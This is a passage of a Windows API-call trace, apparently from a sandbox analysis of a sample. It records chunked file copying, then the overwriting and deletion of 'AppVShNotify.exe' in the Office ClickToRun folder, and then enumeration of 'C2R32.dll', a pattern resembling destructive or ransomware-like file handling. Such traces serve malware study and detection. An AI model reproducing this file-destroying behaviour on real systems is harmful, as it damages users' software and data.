nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.523] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.525] GetLastError () returned 0x0 [0093.526] SetLastError (dwErrCode=0x0) [0093.526] GetLastError () returned 0x0 [0093.526] SetLastError (dwErrCode=0x0) [0093.526] GetLastError () returned 0x0 [0093.526] SetLastError (dwErrCode=0x0) [0093.526] GetLastError () returned 0x0 [0093.526] SetLastError (dwErrCode=0x0) [0093.526] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.527] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.527] GetLastError () returned 0x0 [0093.531] SetLastError (dwErrCode=0x0) [0093.531] GetLastError () returned 0x0 [0093.531] SetLastError (dwErrCode=0x0) [0093.531] GetLastError () returned 0x0 [0093.531] SetLastError (dwErrCode=0x0) [0093.531] GetLastError () returned 0x0 [0093.531] SetLastError (dwErrCode=0x0) [0093.531] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.531] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.532] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.532] SetLastError (dwErrCode=0x0) [0093.532] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.533] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.533] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.533] GetLastError () returned 0x0 [0093.533] SetLastError (dwErrCode=0x0) [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.534] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.534] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.534] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.534] GetLastError () returned 0x0 [0093.534] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.535] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] GetLastError () returned 0x0 [0093.535] SetLastError (dwErrCode=0x0) [0093.535] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.535] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.536] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] GetLastError () returned 0x0 [0093.536] SetLastError (dwErrCode=0x0) [0093.536] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.536] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.537] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] GetLastError () returned 0x0 [0093.537] SetLastError (dwErrCode=0x0) [0093.537] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.537] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.538] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] GetLastError () returned 0x0 [0093.538] SetLastError (dwErrCode=0x0) [0093.538] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.538] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.539] GetLastError () returned 0x0 [0093.539] SetLastError (dwErrCode=0x0) [0093.539] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.539] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.539] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x6d8, lpOverlapped=0x0) returned 1 [0093.539] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.539] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0093.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0093.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0093.540] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x6e0, lpOverlapped=0x0) returned 1 [0093.541] GetLastError () returned 0x0 [0093.541] SetLastError (dwErrCode=0x0) [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.541] GetLastError () returned 0x0 [0093.541] SetLastError (dwErrCode=0x0) [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0093.541] CloseHandle (hObject=0x418) returned 1 [0093.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0093.541] CloseHandle (hObject=0x33c) returned 1 [0093.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.542] AreFileApisANSI () returned 1 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0093.545] GetFileType (hFile=0x33c) returned 0x1 [0093.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0093.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0093.545] GetLastError () returned 0xb7 [0093.545] SetLastError (dwErrCode=0xb7) [0093.545] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0093.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0093.546] CloseHandle (hObject=0x33c) returned 1 [0093.547] AreFileApisANSI () returned 1 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x858a0 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.547] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0093.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.548] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0, dwReserved0=0x1, dwReserved1=0x0, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0093.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0093.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.549] AreFileApisANSI () returned 1 [0093.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", lpUsedDefaultChar=0x0) returned 68 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0093.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0093.550] AreFileApisANSI () returned 1 [0093.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0093.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82b98 [0093.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=68 | out: 